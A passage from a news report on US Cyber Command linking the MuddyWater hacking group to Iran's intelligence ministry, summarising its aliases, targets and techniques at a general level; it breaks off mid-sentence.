Yesterday, MuddyWater’s ties to the Iranian intelligence establishment were officially confirmed by the United States Cyber Command (USCYBERCOM). The espionage hacker’s numerous open-source tools and strategies for hacking into victim systems were also disclosed.
USCYBERCOM’s Cyber National Mission Force (CNMF) stated:
MuddyWater has been seen using a variety of techniques to maintain access to victim networks. These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.
The agency described the cyberattacks as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), confirming previous reports about the origins of the threat actor.
More on MuddyWater
The MuddyWater Advanced Persistent Threat (APT), also known as Static Kitten, Seedworm, Mercury, and TEMP.Zagros, is notorious for its attacks in the Middle East, primarily targeting governments, educational institutions, cryptocurrency, telecommunications, and oil companies.
The cybercrime organization is thought to have been operational since at least 2017.
Recent attacks organized by the threat actor have included abusing the ZeroLogon (CVE-2020-1472) flaw as well as leveraging remote desktop management tools such as ScreenConnect and Remote Utilities to deliver custom malware that could allow the cybercriminals to obtain unauthorized access to confidential